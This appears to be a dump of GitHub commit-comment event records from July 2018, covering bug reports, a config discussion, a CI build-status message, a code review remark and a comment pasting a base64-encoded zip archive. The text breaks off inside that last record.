{"id":"8038019127","type":"CommitCommentEvent","actor":{"login":"LouisGac"},"repo":{"name":"LimeSurvey/LimeSurvey"},"payload":{"comment":{"id":29887666,"position":null,"line":null,"path":null,"commit_id":"d1a279268a8973baba19739aee063330e5591b0d","created_at":"2018-07-30T14:19:37Z","updated_at":"2018-07-30T14:19:37Z","author_association":"CONTRIBUTOR","body":"this commit broke quotas (when submitting a quota, and clicking back button to change it )"}},"created_at":"2018-07-30T14:19:37Z"}
{"id":"8038019616","type":"CommitCommentEvent","actor":{"login":"paladox"},"repo":{"name":"miraheze/mw-config"},"payload":{"comment":{"id":29887668,"position":null,"line":null,"path":null,"commit_id":"5f0d36b84129605219083e9c24caf13a185be1b3","created_at":"2018-07-30T14:19:41Z","updated_at":"2018-07-30T14:19:41Z","author_association":"MEMBER","body":"Uh, i am confused now. You said to manually add it which i did and then remove it from ManageWiki."}},"created_at":"2018-07-30T14:19:41Z"}
{"id":"8038019732","type":"CommitCommentEvent","actor":{"login":"nrel-bot"},"repo":{"name":"NREL/EnergyPlus"},"payload":{"comment":{"id":29887670,"position":null,"line":null,"path":null,"commit_id":"ce033af8f4259cfbe8521101fae6293bb218c3c8","created_at":"2018-07-30T14:19:42Z","updated_at":"2018-07-30T14:19:42Z","author_association":"NONE","body":"159125973_Issue#6843 (Nigusse) - i386-Windows-7-VisualStudio-14: OK (2954 of 2954 tests passed, 0 test warnings)\n\n\n\n\n\n\n<a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-i386-Windows-7-VisualStudio-14.html'>![Build Badge](http://img.shields.io/badge/build%20status-passing-green.png)</a> <a href='https://nrel.github.io/EnergyPlusBuildResults/EnergyPlus-ce033af8f4259cfbe8521101fae6293bb218c3c8-i386-Windows-7-VisualStudio-14.html'>![Test Badge](http://img.shields.io/badge/tests%20passed-100.0%25-green.png)</a> \n"}},"created_at":"2018-07-30T14:19:42Z"}
{"id":"8038020095","type":"CommitCommentEvent","actor":{"login":"smiths"},"repo":{"name":"smiths/caseStudies"},"payload":{"comment":{"id":29887675,"position":null,"line":null,"path":null,"commit_id":"0b7a8fad0493cebdd80fb1156ad7d00b40667b88","created_at":"2018-07-30T14:19:46Z","updated_at":"2018-07-30T14:19:46Z","author_association":"OWNER","body":"I did a quick code review and this looks good.  I might have missed a detail, but from the big picture point of view, you got it.  😄 "}},"created_at":"2018-07-30T14:19:46Z"}
{"id":"8038020159","type":"CommitCommentEvent","actor":{"login":"HybridDog"},"repo":{"name":"HybridDog/simple_robots"},"payload":{"comment":{"id":29887677,"position":null,"line":null,"path":null,"commit_id":"114df74f1981adaccb9e8c80e819b97da5f1e7ea","created_at":"2018-07-30T14:19:47Z","updated_at":"2018-07-30T14:19:47Z","author_association":"OWNER","body":"What about this one?\r\n```\r\n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